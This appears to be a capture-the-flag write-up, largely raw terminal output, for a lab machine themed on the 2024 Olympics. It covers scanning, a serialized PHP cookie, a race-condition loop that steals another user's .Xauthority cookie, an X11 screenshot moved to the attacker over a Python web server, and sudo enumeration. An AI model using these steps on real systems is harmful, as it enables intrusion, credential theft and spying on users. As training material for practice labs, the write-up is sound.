a ctfer on the load

1
┌──(parallels㉿kali-linux-2024-2)-[~]
2
└─$ sudo arp-scan -l
3
Interface: eth0, type: EN10MB, MAC: 00:1c:42:fd:ba:b5, IPv4: 192.168.31.187
4
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
5
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
6
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
7
192.168.31.1    58:ea:1f:38:ff:17       (Unknown)
8
192.168.31.106  08:00:27:91:df:4a       (Unknown)
9
192.168.31.186  42:60:96:7b:26:bd       (Unknown: locally administered)
10
192.168.31.210  f4:6d:3f:27:e6:fb       (Unknown)
11

12
8 packets received by filter, 0 packets dropped by kernel
13
Ending arp-scan 1.10.0: 256 hosts scanned in 1.841 seconds (139.05 hosts/sec). 4 responded
14

15
┌──(parallels㉿kali-linux-2024-2)-[~]
16
└─$ nmap -sC -sV 192.168.31.106
17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-07 16:22 CST
18
Nmap scan report for 192.168.31.106
19
Host is up (0.0039s latency).
20
Not shown: 998 closed tcp ports (conn-refused)
21
PORT   STATE SERVICE VERSION
22
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
23
| ssh-hostkey:
24
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
25
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
26
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
27
|_http-title: Paris 2024 Olympic Games
28
|_http-server-header: Apache/2.4.61 (Debian)
29
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
30

31
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
32
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds

1
┌──(parallels㉿kali-linux-2024-2)-[~]
2
└─$ dirb http://192.168.31.106 /
3

4
-----------------
5
DIRB v2.22
6
By The Dark Raver
7
-----------------
8

9
START_TIME: Fri Mar  7 16:26:54 2025
10
URL_BASE: http://192.168.31.106 /
11
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
12

13
-----------------
14

15
                                                                             GENERATED WORDS: 4612
16

17
---- Scanning URL: http://192.168.31.106 / ----
18
                                                                                                                                                          ==> DIRECTORY: http://192.168.31.106 /img/
19
+ http://192.168.31.106 /index.php (CODE:200|SIZE:7812)
20
+ http://192.168.31.106 /server-status (CODE:403|SIZE:280)
21

22
---- Entering directory: http://192.168.31.106 /img/ ----
23
                                                                             (!) WARNING: Directory IS LISTABLE. No need to scan it.
24
    (Use mode '-w' if you want to scan it anyway)
25

26
-----------------
27
END_TIME: Fri Mar  7 16:26:58 2025
28
DOWNLOADED: 4612 - FOUND: 2

1
┌──(parallels㉿kali-linux-2024-2)-[~]
2
└─$ dirsearch -u "http://192.168.31.106 /" -x 403 -e php,zip,txt
3
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
4
  from pkg_resources import DistributionNotFound, VersionConflict
5

6
  _|. _ _  _  _  _ _|_    v0.4.3
7
 (_||| _) (/_(_|| (_| )
8

9
Extensions: php, zip, txt | HTTP method: GET | Threads: 25
10
Wordlist size: 10439
11

12
Output File: /home/parallels/reports/http_192.168.31.106 /__25-03-07_16-29-03.txt
13

14
Target: http://192.168.31.106 /
15

16
[16:29:03] Starting:
17
[16:29:11] 301 -  316B  - /img  ->  http://192.168.31.106 /img/
18

19
Task Completed

1
┌──(parallels㉿kali-linux-2024-2)-[~]
2
└─$ gobuster dir -u 192.168.31.106  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt
3
===============================================================
4
Gobuster v3.6
5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6
===============================================================
7
[+] Url:                     http://192.168.31.106
8
[+] Method:                  GET
9
[+] Threads:                 10
10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11
[+] Negative Status codes:   404
12
[+] User Agent:              gobuster/3.6
13
[+] Extensions:              php,txt
14
[+] Timeout:                 10s
15
===============================================================
16
Starting gobuster in directory enumeration mode
17
===============================================================
18
/.php                 (Status: 403) [Size: 280]
19
/index.php            (Status: 200) [Size: 7812]
20
/img                  (Status: 301) [Size: 316] [--> http://192.168.31.106 /img/]
21
/preferences.php      (Status: 200) [Size: 3163]
22
/.php                 (Status: 403) [Size: 280]

1
No user preferences were found or the cookie has expired. Please check your cookie settings or contact the site administrator if the problem persists

1
GET /preferences.php HTTP/1.1
2
Host: 192.168.31.106
3
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate, br
7
Connection: keep-alive
8
Cookie: preferences=TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjI6ImZyIjtzOjE1OiJiYWNrZ3JvdW5kQ29sb3IiO3M6NDoiI2RkZCI7fQ%3D%3D
9
Upgrade-Insecure-Requests: 1

1
O:15:"UserPreferences":2:{s:8:"language";s:2:"fr";s:15:"backgroundColor";s:4:"#ddd";}

1
www-data@MiWiFi-R4CM-srv:/home/vanity$ ls -la
2
ls -la
3
total 76
4
drwxr-xr-x 10 vanity vanity 4096 Mar  7 12:44 .
5
drwxr-xr-x  3 root   root   4096 Jul 28  2024 ..
6
-rw-------  1 vanity vanity  218 Mar  7 12:43 .Xauthority
7
lrwxrwxrwx  1 root   root      9 Jul 26  2024 .bash_history -> /dev/null
8
-rw-r--r--  1 vanity vanity  220 Jul 29  2024 .bash_logout
9
-rw-r--r--  1 vanity vanity 3526 Jul 29  2024 .bashrc
10
drwxr-xr-x  7 vanity vanity 4096 Jul 29  2024 .cache
11
drwx------ 13 vanity vanity 4096 Jul 29  2024 .config
12
-rw-r--r--  1 vanity vanity   35 Jul 29  2024 .dmrc
13
-rw-------  1 vanity vanity   36 Jul 29  2024 .lesshst
14
drwxr-xr-x  3 vanity vanity 4096 Jul 29  2024 .local
15
-rw-r--r--  1 vanity vanity  807 Jul 29  2024 .profile
16
drwx------  2 vanity vanity 4096 Jul 29  2024 .ssh
17
-rw-r--r--  1 vanity vanity    8 Jul 29  2024 .xprofile
18
drwxr-xr-x  2 vanity vanity 4096 Jul 29  2024 Desktop
19
drwxr-xr-x  2 vanity vanity 4096 Jul 29  2024 Documents
20
drwxr-xr-x  2 vanity vanity 4096 Jul 29  2024 Images
21
-rwxr-xr-x  1 vanity vanity  557 Jul 29  2024 backup
22
drwx------  2 vanity vanity 4096 Jul 29  2024 creds
23
-rwx------  1 vanity vanity   33 Jul 29  2024 user.txt

1
www-data@MiWiFi-R4CM-srv:/home/vanity$ cat backup
2
cat backup
3
#!/bin/bash
4

5
SRC="/home/vanity"
6
DEST="/backup"
7

8
rm -rf /backup/{*,.*}
9

10
echo "Starting copy..."
11
find "$SRC" -maxdepth 1 -type f ! -name user.txt | while read srcfile; do
12
    destfile="$DEST${srcfile#$SRC}"
13
    mkdir -p "$(dirname "$destfile")"
14
    dd if="$srcfile" of="$destfile" bs=4M
15

16
    md5src=$(md5sum "$srcfile" | cut -d ' ' -f1)
17
    md5dest=$(md5sum "$destfile" | cut -d ' ' -f1)
18
    if [[ "$md5src" != "$md5dest" ]]; then
19
        echo "MD5 mismatch for $srcfile :("
20
    fi
21
    chmod 700 "$destfile"
22

23
done
24

25

26
echo "Copy complete. All files verified !"

1
www-data@jo2024:/$ while true; do cat /backup/.Xauthority >> /tmp/log 2>/dev/null;sleep 0.01; done
2
<Xauthority >> /tmp/log 2>/dev/null;sleep 0.01; done

1
www-data@jo2024:/$ cat /tmp/log
2
cat /tmp/log
3
debian11MIT-MAGIC-COOKIE-1>7
4
EXJ[fdebian0MIT-MAGIC-COOKIE-1mlJ
5

6
jo2024.hmv0MIT-MAGIC-COOKIE-1A6&Xj*Zdebian11MIT-MAGIC-COOKIE-1>7

1
www-data@jo2024:/$ w
2
 14:03:43 up  4:43,  1 user,  load average: 0.44, 0.29, 0.14
3
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
4
vanity   tty7     :0               09:20    4:43m  0.00s  0.07s /usr/bin/lxsession -s LXDE -e LXDE
5

6
export XAUTHORITY=/tmp/log
7

8
xwd -root -screen -silent -display :0 > screenshot.xwd
9

10
python3 -m http.server 2131(传到kali)
11

12
convert screenshot.xwd screenshot.png

1
vanity@MiWiFi-R4CM-srv:~$ sudo -l
2
sudo: unable to resolve host MiWiFi-R4CM-srv: No address associated with hostname
3
Matching Defaults entries for vanity on MiWiFi-R4CM-srv:
4
    env_reset, mail_badpass,
5
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
6
    use_pty
7

8
User vanity may run the following commands on MiWiFi-R4CM-srv:
9
    (ALL : ALL) NOPASSWD: /usr/local/bin/php-server.sh
10

11
vanity@MiWiFi-R4CM-srv:~$ cat /usr/local/bin/php-server.sh
12
#!/bin/bash
13

14
/usr/bin/php -t /opt -S 0.0.0.0:8000

1
Olympic Athlete Password Leaked!
2
A hacker claims to have obtained the password of a famous Olympic athlete. According to the hacker, he managed to hack into the personal account of the famous sprinter, Usain Bolt!
3

4
The hacker has provided what he claims to be Usain Bolt's account password as proof of his achievement. For security reasons and to protect the athlete's privacy, the content below is blurred and requires a subscription to be revealed.
5

6
奥运会运动员密码泄漏了！
7

8
一位黑客声称已经获得了著名奥运会运动员的密码。根据黑客的说法，他设法闯入了著名的短跑运动员Usain Bolt的个人帐户！
9

10
黑客提供了他声称是Usain Bolt的帐户密码的证明，以证明他的成就。出于安全原因并保护运动员的隐私，下面的内容模糊不清，需要订阅以揭示。

1
data-content="As part of a recent cyber attack, we managed to access Usain Bolt's personal account. The password associated with his account is <strong>LightningBolt123</strong>. This breach demonstrates the vulnerabilities of even the most secure systems."